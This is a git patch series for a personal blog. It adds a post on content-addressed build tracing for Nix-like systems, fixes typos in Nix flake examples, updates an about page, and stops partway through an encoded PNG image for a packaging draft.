From 0c81e45ce4534db508ef77ce775830e0b7f49c16 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Sat, 27 Jan 2024 19:42:48 -0800 Subject: [PATCH 01/10] build systems Content --- content/posts/build-systems-ca-tracing.md | 249 ++++++++++++++++++++++ 1 file changed, 249 insertions(+) create mode 100644 content/posts/build-systems-ca-tracing.md diff --git a/content/posts/build-systems-ca-tracing.md b/content/posts/build-systems-ca-tracing.md new file mode 100644 index 0000000..769c688 --- /dev/null +++ b/content/posts/build-systems-ca-tracing.md 
@@ -0,0 +1,249 @@ ++++ +date = "2024-01-27" +draft = false +path = "/blog/build-systems-ca-tracing" +tags = ["build-systems", "nix"] +title = "Build systems: content addressed tracing" ++++ + +An idea I have lying around is something I am going to call "ca-tracing" for +the purposes of this post. The concept is to instrument builds and observe what +they actually did, and record that for future iterations such that excess +dependencies can be ignored if, *even if inputs changed*, the instructions are +the same and the files actually observed by the build are the same. + +# Implementation + +## Assumptions + +This idea assumes a hermetic build system, since we need to know if anything +might have differed from build to build, so we need a complete accounting of +the inputs to the build. It is not necessarily the case that such a hermetic +build system would be Nix-like, however, it is easiest to describe on top of a +Nix-like; first one with build identity, then one that lacks build identity +like Nix. + +This also assumes a content-addressed build system with early cut-off like Nix +with [ca-derivations]. In Nix's case, input-addressed builds are executed, then +renamed to a content-addressed path: if a build with different inputs is +executed once more with the same output, it is recorded as resolving to that +output, and further builds are cut off. + +[ca-derivations]: https://www.tweag.io/blog/2021-12-02-nix-cas-4/ + + + +## Conceptual implementation + +Conceptually, a build is a function: + +> (*inputs*, *instructions*) -> *outputs* + +We wish to narrow *inputs* to *inputsactual*, and save this +information alongside *outputs*. In a following build, we can then verify if +*instructions'* matches a previous build (*instructions*) and if so, extract +the values of the same dynamically observed *inputs'actual*, but +relative to *inputs'* and compare them to the values of +*inputsactual* from the previous build. 
+ +Since our build system is hermetic, if this hits cache, it can be assumed to have +identical results, modulo any nondeterminism (which we assume to be +unfortunate but unproblematic, and is there regardless of this technique). + +## Making it concrete + +A build ("derivation" in Nix) in a Nix-like system is a specification of: + +* Inputs (files, other derivations) +* Environment variables +* Command to execute + +The point of ca-tracing is to remove excess inputs, so let's contemplate how to +do that. + +### File names + +The inputs are files named based on `hash(contents)` in Nix, but we don't +know which contents we will actually access. This is a problem, since the file +paths of *inputs* need to remain constant across multiple executions of the +build (the paths for *inputs* must equal the paths for *inputs'*), since the +part of *inputs* that changed may be irrelevant to this build. + +In a system that doesn't look like Nix, the input file paths might be the same +across two builds on account of not containing hashes, so this would not be a +problem. + +We can solve the file names problem by replacing the hash parts in the input +filenames with random values per-run. These hashes should never appear, even in +part, in the output, if the builder is not doing things with them that would +render the build non-deterministic. + +Unfortunately the file names may appear in the output through the ordering of +deterministic hash tables, for instance, which could be a problem; this exists +in practice in ELF hash tables for instance. Realistically we would need +file-type-specific rewriters to fixup execution output to a deterministic +result following multiple runs. + +We would also have to rewrite those hashes within blocks of data read from +within the builder, but that's *possibly* just a few FUSE crimes away to be +able to do live, on-demand. 
+ +Following the build, the temporary hashes of the inputs can be substituted for +their concrete values pointing to the larger inputs †. + + + +### Tracing, filesystem + +To trace a build, one would have to pull the filesystem activity. This is +possible with some BPF tracing constrained to some cgroup on Linux, so that is +not the hard part. + +The data that would have to be known is: + +* Observed directory listings with hashes +* Read file names matching *inputs*, with associated hashes +* Extremely annoyingly: `fstat(2)` results for all queried files in inputs + (this is extremely annoying because everything calls `fstat` all the time + pointlessly or to check for files being present, and it includes things like + the length of a file, which could *in principle* cause unsoundness if not + recorded). + +This would then all be compared to the equivalent paths in *inputs'* and if the +hashes match, the previous build could be immediately used. + +## Avoiding build identity; how would this work in Nix? + +Nix is built on top of an on-disk key-value store (namely, the directory +`/nix/store`), which is a mapping: + +> Hash -> Value + +Thus, we just need to construct a hash in such a way that both Build and Build' +get the same hash value. + +We could achieve this by modifying the derivation in a deterministic manner +such that two modified-derivations share a hash if they could plausibly have +ca-tracing applied. Specifically, rewrite the input hashes to something like +the following: + +> hash("ca-tracing" + name + position-in-inputs) + "-" + name + +When a build is invoked, modify the derivation, hash it, and check for the +presence of a record of a modified-derivation of the same hash, and then check +if the actually-used filesystem objects when applied to *inputs'* remain the +same. 
+ +# Use cases + +This idea is almost certainly best suited for builds using the smallest +possible unit of work, both in terms of usefulness and likelihood of bugs in +the rewriting. To use the terminology from [Build Systems à la Carte][bsalc], +it is likely most useful for systems that are closer to constructive traces +than deep constructive traces. + +[bsalc]: https://www.microsoft.com/en-us/research/uploads/prod/2018/03/build-systems.pdf + +For example, if this is applied to individual compiler jobs in a C++ project, +it can eliminate rebuilds from imprecise build system dependency tracking, +whereas if the derivation/unit of work is larger, the rebuild might be +necessary anyway. + +# Problems + +* There could exist multiple instances of a modified-derivation with different + filesystem activity, due to, say, a bunch of rebuilds against very + differently patched inputs. This system would have to be able to either + represent that or just discard old ones. +* Real programs abuse `fstat(2)` way too much and it's very likely that this + whole thing might not actually get any cache hits in practice if `fstat` + calls are considered. Without visibility into processes we cannot know if + `fstat` calls' results are actually used for anything more than checking if a + file exists. + + This might benefit from some limited dynamic tracing inside processes to + determine whether the fstat result is actually read. +* The whole enterprise is predicated on generalized sound rewriting, which is + likely very hard; see below. 
+ +## Naive rewriting is a bad idea + +The implementation of ca-derivations itself, where it just rewrites hashes +appearing in random binaries with the moral equivalent of `sed`, is extremely +unsound with respect to compression, ordered structures (even NAR files would +fall victim to this), and any other kind of non-literal storage of store paths, +and this approach just adds yet more naive rewriting that is likely to explode +spectacularly at runtime. + +Naively rewriting store paths is an extension of the original idea of Nix doing +runtime dependencies by naively scanning for reference paths. However, +crucially, the latter does not *modify* random binaries without any knowledge +of their contents, and the worst case scenario for that reference scanning is a +runtime error when someone downloads a binary package. + +Realistically, this would have to be done with a "[diffoscope] of rewriters", +which can parse any format and rewrite references in it. We can check soundness of a +build under rewriting by simply running it more times. The rewriter need +not be a trusted component, since its impact is only as far as breaking your +binaries (reproducibly so), which Nix is great at already! + +In an actual implementation, I would even go so far as saying the rewriter +*must not* be part of Nix since it is generally useful, and it is fundamentally +something that would have to move pretty fast and perhaps even have per-project +modifications such that it cannot possibly be in a Nix stability guarantee. + +[diffoscope]: https://diffoscope.org/ + +# Related work + +This is essentially the idea of edef's incomplete project [Ripple], an +arbitrary-program memoizer, among other work, but significantly scaled down to +be less general and possibly more feasible. Compared to her project, this idea +doesn't look into processes at all, and simply involves tracing filesystem +accesses to read-only resources in an already-hermetic build system. 
+ +Thanks to edef for significant feedback and discussion about this post. You can +[sponsor her on GitHub here][edef-gh] if you want to support her work on making +computers more sound such as the Nix content addressed cache project, tvix, and +also her giving these ideas to Arch Linux developers. + +[edef-gh]: https://github.com/sponsors/edef1c + +[Ripple]: https://nlnet.nl/project/Ripple/ + From ad7288ed419340b83fc119700711687b68cafbfb Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Tue, 13 Feb 2024 14:39:25 -0800 Subject: [PATCH 02/10] fix typo in flakes --- content/posts/flakes-arent-real.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 20648e0..9e16e7b 100644 --- a/content/posts/flakes-arent-real.md +++ b/content/posts/flakes-arent-real.md @@ -167,11 +167,12 @@ even if the same package name appears in both. Magic ✨ That is, in the following intentionally-flawed-for-other-reasons `flake.nix`: ```nix -{...}: { +{ + # .... outputs = { nixpkgs, ... }: - let pkgs = nixpkgs.legacyPackages.x86_64-linux; - in { - packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; + let pkgs = nixpkgs.legacyPackages.x86_64-linux; + in { + packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; }; } ``` From 9cdbf1eaf19096380fe4ddf633732329259aa0b1 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Tue, 13 Feb 2024 14:43:13 -0800 Subject: [PATCH 03/10] wow another typo --- content/posts/flakes-arent-real.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 9e16e7b..01df387 100644 --- a/content/posts/flakes-arent-real.md +++ b/content/posts/flakes-arent-real.md 
@@ -464,11 +464,11 @@ nixosConfigurations.something = nixpkgs.lib.nixosSystem { specialArgs = { myPkgs = nixpkgs; }; - modules = { - { pkgs, lib, myPkgs }: { + modules = [ + ({ pkgs, lib, myPkgs }: { # do something with myPkgs - } - }; + }) + ]; } ``` From e9e9a55b51a505c8e5257b268b374c3d7547d1b2 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Wed, 14 Feb 2024 00:17:19 -0800 Subject: [PATCH 04/10] update about page --- content/posts/about.md | 25 ++++++++++++++----------- templates/base.html | 2 ++ 2 files changed, 16 insertions(+), 11 deletions(-) diff --git a/content/posts/about.md b/content/posts/about.md index d94e758..862ba16 100644 --- a/content/posts/about.md +++ b/content/posts/about.md 
@@ -9,20 +9,23 @@ isPage = true +++ Hi! -I'm an undergraduate student in Computer Engineering at the University of -British Columbia. +I'm an final-year undergraduate student in Computer Engineering at the +University of British Columbia. -I have done mechanical design for ThunderBots, a RoboCup Small Size League team -building soccer-playing robots. Prior to this, I was on a 4 person team -participating in Skills Canada Robotics, and in my last year of high school, we -had the opportunity to [go to Nationals in -Halifax](/blog/i-competed-in-skills-canada-robotics), where we achieved first -place for Saskatchewan. +In my spare time, when I am not dreaming of all computers landing on the sun, I +work on [NixOS](https://nixos.org) in various places in the project, and a +whole slew of projects you can find on my GitHub profile. I'm most interested +in compilers, operating systems, and build systems. I am a full stack +developer: I can competently write both SystemVerilog and websites, and most +things in between: programming languages are a dime a dozen and I speak a lot +of them, from Rust to Haskell, C/C++, Python, to Fake Haskell That Compiles to +Bash (Nix). I often cosplay (perhaps too successfully) as a build engineer. -Other than robotics, I am most interested in Rust and embedded systems, -especially the security thereof. +When I *am* dreaming of computers experiencing solar destruction, I like +sewing, going on long walks, and cooking. -To contact me, email `jade` at this domain (jade dot fyi). +To contact me, email `jade` at this domain (jade dot fyi) or ping me [on +fedi](https://hachyderm.io/@leftpaddotpy). Jade she/they diff --git a/templates/base.html b/templates/base.html index dc1baf1..b5ec4b0 100644 --- a/templates/base.html +++ b/templates/base.html @@ -17,6 +17,8 @@ + + {{ config.title }} From 06267b2bf7ababe804e915dd569a9a28c4472351 Mon Sep 17 00:00:00 2001 
From: Jade Lovelace Date: Sun, 10 Mar 2024 18:56:14 -0700 Subject: [PATCH 05/10] packaging draft --- .../antifa-demon-core.png | Bin 0 -> 137053 bytes .../packaging-is-extremely-hard/index.md | 256 ++++++++++++++++++ 2 files changed, 256 insertions(+) create mode 100644 content/posts/packaging-is-extremely-hard/antifa-demon-core.png create mode 100644 content/posts/packaging-is-extremely-hard/index.md 
diff --git a/content/posts/packaging-is-extremely-hard/antifa-demon-core.png b/content/posts/packaging-is-extremely-hard/antifa-demon-core.png new file mode 100644 index 0000000000000000000000000000000000000000..ec6c1bd6ce1695d9e69d95b6a930b75fcb3438a7 GIT binary patch literal 137053
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 